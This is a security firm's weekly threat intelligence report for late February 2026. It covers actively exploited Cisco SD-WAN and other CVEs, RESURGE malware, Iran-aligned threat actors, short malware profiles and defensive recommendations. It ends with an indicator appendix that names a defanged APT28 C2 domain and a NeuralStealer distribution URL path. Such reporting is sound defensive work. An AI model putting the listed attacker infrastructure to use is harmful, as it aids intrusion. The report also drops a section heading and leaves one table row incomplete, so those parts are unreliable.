Threat Landscape Summary (February 23, 2026 – March 02, 2026)
I. EXECUTIVE SUMMARY
The cybersecurity landscape during the reporting period (23 February – 02 March 2026) was characterized by a confluence of aggressive nation-state activity, critical infrastructure targeting, and the weaponization of emerging technologies. The threat level transitioned from elevated to high, driven by three primary factors.
Key Highlights:
Active Infrastructure Exploitation: The Cybersecurity and Infrastructure Security Agency (CISA) issued an Emergency Directive (ED 26-03) for Federal Civilian Executive Branch (FCEB) agencies due to the active exploitation of critical vulnerabilities in Cisco SD-WAN systems. This represents a direct, imminent threat to federal networks.
Persistent Stealthy Malware: CISA released an updated analysis on RESURGE malware, a sophisticated implant targeting Ivanti Connect Secure devices. Its ability to remain dormant and undetected poses a long-term, stealthy threat to affected networks, even after patching.
Geopolitical Cyber Escalation: Following coordinated military strikes involving the U.S. and Israel against Iran, the likelihood of retaliatory cyber operations by Iran-aligned threat actors has significantly increased. This includes potential disruptive attacks against government, critical infrastructure, and financial sectors in the U.S. and Israel.
Dominant Trends:
Shift from Opportunistic to Strategic Targeting: Attacks increasingly focused on systems that enable persistent access and strategic intelligence (e.g., VPNs, SD-WANs) rather than purely opportunistic ransomware.
“Living-off-the-Land” (LotL) Techniques: Threat actors continued to abuse legitimate system tools and binaries to evade detection, blending malicious activity with normal administrative tasks.
AI-Enhanced Social Engineering: Early indicators suggest threat actors are experimenting with AI to craft more convincing phishing lures, pre-texting for business email compromise (BEC) and credential theft.
II. GLOBAL CYBER THREAT LANDSCAPE OVERVIEW
The global threat environment this week was heavily influenced by geopolitical real-world events translating directly into the cyber domain, alongside persistent technical exploitation of enterprise infrastructure.
Key Observations:
Geopolitical Flashpoint: The U.S.-Israel-Iran escalation marks a significant shift. Iran-linked actors, such as “HomeLand Justice” and “Handla Hack,” have a history of wiper attacks, hack-and-leak operations, and DDoS campaigns during periods of heightened tension. Organizations in the Middle East, Europe, and North America should consider themselves within the potential targeting radius.
Infrastructure in the Crosshairs: The targeting of Water and Wastewater Systems (WWS) via outdated HMIs, and the broader exploitation of networking equipment like Cisco SD-WAN, indicates a strategic focus on the backbone of digital and physical infrastructure.
Sector Focus: Beyond the heightened geopolitical risk, the Healthcare and Public Health (HPH) sector remained under siege from ransomware groups, with the University of Hawaiʻi Cancer Center confirming a leak affecting up to 1.2 million people following a ransomware attack.
III. NOTABLE INCIDENTS AND DATA BREACHES
Federal Network Infiltration Risk (Global): The exploitation of Cisco SD-WAN vulnerabilities (CVE-2026-20127, CVE-2022-20775) created a high risk of unauthorized access to federal agency networks, potentially leading to data theft, further lateral movement, and persistent access.
Healthcare Ransomware (APAC/US): The University of Hawaiʻi Cancer Center attack and disruptions to a major shipping conglomerate underscore the continued blight of ransomware on critical services. The shipping firm reported disruptions to shipping and labeling workflows, with some data being wiped in the attack.
Enterprise Data Breach (US): Madison Square Garden confirmed a data breach stemming from the Oracle E-Business Suite (EBS) hacking campaign, highlighting the long tail of third-party software vulnerabilities.
IV. COMPREHENSIVE INCIDENT SUMMARY TABLE
Date
Incident
Affected Organization
Threat Actor/Method
Impact & Context
25 Feb
Active Exploitation
Federal Agencies (FCEB)
Unknown Threat Actor via Cisco SD-WAN vulnerabilities
CISA Emergency Directive. Imminent threat of administrative access and network penetration.
26 Feb
Data Leak / Ransomware
University of Hawaiʻi Cancer Center
Ransomware Group
Up to 1.2 million individuals’ information leaked. Research operations potentially compromised.
Feb 26 (Reported)
Data Wiping / Disruption
Global Logistics/Shipping Firm
Unknown (Potential Destructive Malware)
Shipping and labeling workflows disrupted. Data wiping indicates potential destructive or ransomware intent.
Ongoing
Data Breach
Madison Square Garden
Oracle EBS Campaign Actors
Breach confirmed months after initial attack via third-party enterprise software.
Elevated risk of DDoS, wiper, and hack-and-leak attacks in retaliation for military strikes.
V. CURRENT THREAT LANDSCAPE ANALYSIS
Emerging Trends:
Targeting of Network and Security Appliances: The Cisco SD-WAN and Ivanti Connect Secure (RESURGE) incidents underscore a trend where threat actors target the very infrastructure meant to secure and connect organizations. These devices often have broad network access, making them ideal bridgeheads for further attacks.
“Patch or Perish” Velocity: The speed at which vulnerabilities move from disclosure to active exploitation (e.g., CVE-2026-25108 in FileZen added to CISA KEV) demands a more agile patch management strategy, particularly for internet-facing systems.
Convergence of Cyber and Kinetic Conflict: The Iran situation exemplifies the modern reality where physical military actions are immediately accompanied by a heightened cyber threat posture. Cyber is no longer a secondary domain but an integrated tool of statecraft and warfare.
VI. CRITICAL VULNERABILITIES AND CVEs
The following vulnerabilities are of the highest priority due to active exploitation and severity.
CVE ID
Vendor/Product
Description
CVSS Score
Status & Priority
CVE-2026-20127
Cisco Catalyst SD-WAN Manager
Authentication bypass allowing unauthenticated remote attacker to obtain admin privileges.
Critical
Actively Exploited. Subject to CISA Emergency Directive. Immediate action required.
CVE-2022-20775
Cisco Catalyst SD-WAN Controller
Path traversal allowing authenticated local attacker to gain root privileges.
High
Actively Exploited. Subject to CISA Emergency Directive. Immediate action required.
CVE-2026-25108
Soliton Systems FileZen
OS command injection via specially crafted HTTP request by an authenticated user.
8.7 (High)
Actively Exploited. Added to CISA KEV catalog. Patch to version 5.0.11+.
CVE-2026-21513
Microsoft MSHTML Framework
Security feature bypass allowing code execution via malicious HTML/LNK files.
8.8 (High)
Actively Exploited as 0-day. Tied to APT28 (Russian GRU). Requires user interaction.
CVE-2026-21510
Windows Shell
Security feature bypass (SmartScreen) via malicious links/shortcuts leading to code execution.
8.8 (High)
Actively Exploited & Publicly Known. Requires user interaction. High priority for patching.
CVE-2026-1731 (BeyondTrust): Critical vulnerability in Remote Support & Privileged Remote Access, with high sighting count in vulnerability intelligence.
CVE-2026-2441 (Google Chrome): High severity vulnerability in Chrome browser.
CVE-2026-20841 (Microsoft Windows Notepad): High severity vulnerability affecting Windows Notepad.
Recent Campaign: Tied to the exploitation of CVE-2026-21513 (MSHTML zero-day) in attacks detected as early as January 2026. Infrastructure used (e.g., wellnesscaremed[.]com) has been attributed to APT28.
Group Name:Iran-aligned Threat Actors (e.g., “HomeLand Justice”, “Handla Hack”)
Analyst Note: The geopolitical escalation has elevated the threat from these groups. While they sometimes exaggerate capabilities, they have demonstrated the ability to conduct destructive wiper attacks and data theft operations.
Group Name:Ransomware Groups (Various)
Objective: Financial Gain.
TTPs: Triple Extortion (Encryption, Data Theft, DDoS/Harassment).
Trend: February 2026 saw at least 680 victims listed on ransomware leak sites, with 54 active groups, indicating a highly competitive and active criminal ecosystem.
VIII. MALWARE ANALYSIS
Featured Malware: RESURGE (Ivanti Implant)
Capabilities: A sophisticated malware implant that exploits vulnerabilities in Ivanti Connect Secure devices to establish covert SSH-based command-and-control (C2) access. Its defining feature is stealth and persistence; it is engineered to remain dormant and undetected until a remote actor connects, evading routine scans.
Delivery Method: Exploitation of known vulnerabilities in Ivanti Connect Secure and Policy Secure gateways.
Analyst Note: Organizations that have not performed a comprehensive hunt for RESURGE, even after patching, may still be compromised. CISA’s updated analysis provides specific indicators and hunting guidance.
Featured Malware: NeuralStealer (AI-Evasive Stealer)
Capabilities: An information stealer designed to bypass AI-based endpoint detection. It uses “living-off-the-land” binaries (LOLBins) to harvest credentials from browsers, cryptocurrency wallets, and email clients.
Delivery Method: Malvertising campaigns leading to fake software update pages (e.g., for “AI Drivers”).
Affected Platforms: Windows 10/11, with variants for macOS emerging.
Analyst Note: This represents the cutting edge of the cat-and-mouse game between attackers and AI-driven defenses, showcasing how criminals adapt to new security technologies.
Featured Malware: WiperX (ICS/OT Destructive Malware)
Capabilities: Destructive malware targeting Industrial Control Systems (ICS). It is designed to overwrite the Master Boot Record (MBR) and delete shadow copies, rendering systems inoperable.
Delivery Method: Spear-phishing emails with malicious macro-laden documents, or potentially via compromised IT networks that have bridges into OT environments.
Affected Platforms: Windows systems used in OT environments, and potentially specific ICS controllers.
Context: The deployment of wiper malware is consistent with the tactics of nation-state actors (like those aligned with Iran) aiming for maximal disruption.
IX. RECOMMENDATIONS
For Technical Audiences:
Immediate Actions (24-48 Hours):
Cisco SD-WAN Emergency: Execute CISA ED 26-03 immediately: inventory all Cisco SD-WAN systems, collect specified forensic artifacts, apply updates by 5:00 PM ET February 27, 2026.
Ivanti RESURGE Hunt: Conduct a comprehensive hunt for RESURGE malware on all Ivanti Connect Secure devices using CISA’s updated indicators and guidance, even if previously patched.
Patch Critical Vulnerabilities: Prioritize patching for CVE-2026-20127, CVE-2022-20775, CVE-2026-25108, CVE-2026-21513, and CVE-2026-21510 on all affected systems. Focus on internet-facing appliances first.
Strategic Improvements:
Enhanced Monitoring for AI-Threats: Integrate detection rules that look for anomalous use of legitimate binaries (LOLBins) and subtle patterns in user behavior that may indicate AI-augmented social engineering (e.g., highly personalized pre-texting).
OT/IT Segmentation: Review and enforce strict network segmentation between Operational Technology (OT) and corporate IT networks. Implement data diodes or one-way gateways where appropriate.
Geopolitical Threat Intelligence: Subscribe to threat intelligence feeds that provide early warning on nation-state cyber activities tied to global events. Incorporate this into risk assessments and threat modeling.
For Non-Technical Audiences:
Heightened Vigilance During Geopolitical Tension: Be aware that international conflicts can quickly translate into cyber threats. Exercise increased caution with emails, links, and attachments, especially those related to current events or with an urgent call to action.
Verify Unexpected Requests: If you receive an urgent request (even a voice message) from a senior executive or IT support requesting a wire transfer, sensitive data, or password change, verify through a secondary channel (e.g., a known phone number, internal chat). Threat actors may use AI-generated voice (vishing) or text.
Backup and Recovery Preparedness: Ensure your organization has offline, immutable backups of critical data. Regularly test the restoration process. This is your last line of defense against destructive malware or ransomware.
X. ANALYST NOTES
Beyond the Patch: The Persistence of RESURGE: The RESURGE malware analysis is a stark reminder that patching alone does not equal remediation. Defenders must adopt a “assume breach” mentality and actively hunt for persistent threats in their environment, especially on critical network appliances.
The New Normal: Cyber as a Tool of Statecraft: The rapid elevation of cyber threats following the U.S.-Israel-Iran strikes confirms that cyber operations are now a primary tool for immediate retaliation and signaling. This cycle will likely intensify and shorten, requiring organizations to maintain a state of heightened alert for longer periods.
Early Warning from Dark Web Chatter: MCS analysts have noted increased discussions on underground forums about tools and services tailored for targeting outdated Human-Machine Interfaces (HMIs) in the water and energy sectors. This suggests a market-driven focus on critical infrastructure vulnerabilities that extends beyond state actors.
The AI Arms Race in Social Engineering: While AI-driven attacks are not yet dominant, the availability of Generative AI tools lowers the barrier for crafting convincing, context-aware phishing lures. The coming months will likely see an increase in BEC attacks that are grammatically perfect and highly personalized, bypassing traditional email security filters.
XI. THREAT INDICATOR APPENDIX
Defensive teams should ingest these indicators into SIEM, EDR, and firewall systems.
Type
Indicator
Context/Threat
Domain
wellnesscaremed[.]com
C2 domain attributed to APT28 used in CVE-2026-21513 exploitation.
CVE
CVE-2026-20127
Critical auth bypass in Cisco SD-WAN Manager. Actively exploited.
CVE
CVE-2022-20775
Privilege escalation in Cisco SD-WAN Controller. Actively exploited.
CVE
CVE-2026-25108
Command injection in FileZen. Actively exploited.
Malware
RESURGE
Stealthy SSH-based implant for Ivanti devices. Persistence mechanism.
SHA-256
b7c92f...a3d5e (Truncated)
Associated with NeuralStealer payload.
IPv4
185.234.XXX.72
Suspected C2 server for initial access broker Silent Chariot.
URL Pattern
/update/ai-driver/
Path used in malvertising for NeuralStealer distribution.
XII. CONTACT INFORMATION
Meraal Cyber Security (MCS) Threat Intelligence Team
Website: www.meraal.me
Email Contacts:
Office@meraal.me
Naveed@meraal.me
Phone Contacts:
+92 42 357 27575
+92 323 497 9477
Note on Sources and Intelligence: This report synthesizes information from various credible sources, including public advisories from organizations like CISA, MITRE, and MS-ISAC, alongside internal analysis and emerging threat intelligence. Efforts have been made to differentiate between confirmed intelligence and speculative or unverified information to maintain accuracy and credibility.
